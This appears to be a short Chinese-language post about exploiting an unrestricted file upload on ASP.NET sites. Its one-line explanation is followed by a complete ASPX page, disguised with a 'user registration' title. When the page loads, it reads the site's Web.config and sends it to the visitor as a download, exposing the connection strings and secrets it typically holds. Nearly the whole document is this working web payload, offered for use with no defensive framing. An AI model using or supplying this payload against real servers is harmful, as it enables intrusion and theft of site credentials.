如果某个网站文件、图片上传直接存储到网站目录下,而且没限制文件格式,可上传一个aspx文件,然后直接执行
<%@ Page Language="C#" ContentType="text/html" ResponseEncoding="gb2312" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.IO"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>用户注册</title>
<script language="javascript">
</script>
<script language="c#" runat="server">
string result="";
//服务器上执行的方法
public void Page_Load(Object sender,EventArgs e)
{
using (FileStream fs = new FileStream(Server.MapPath("/")+"Web.config", FileMode.Open, FileAccess.Read))
{
byte[] buffer = new byte[fs.Length];
fs.Read(buffer, 0, buffer.Length);
string msg = System.Text.Encoding.UTF8.GetString(buffer);
//Response.Write(msg);
string timeNow = DateTime.Now.ToString();
Response.Clear();
Response.Buffer = false;
Response.ContentType = "application/octet-stream";
Response.AppendHeader("content-disposition", "attachment;filename=" + "Web" + ".config;");
Response.Write(msg);
Response.Flush();
Response.End();
}
}
</script>
</head>
<body>
</body>
</html>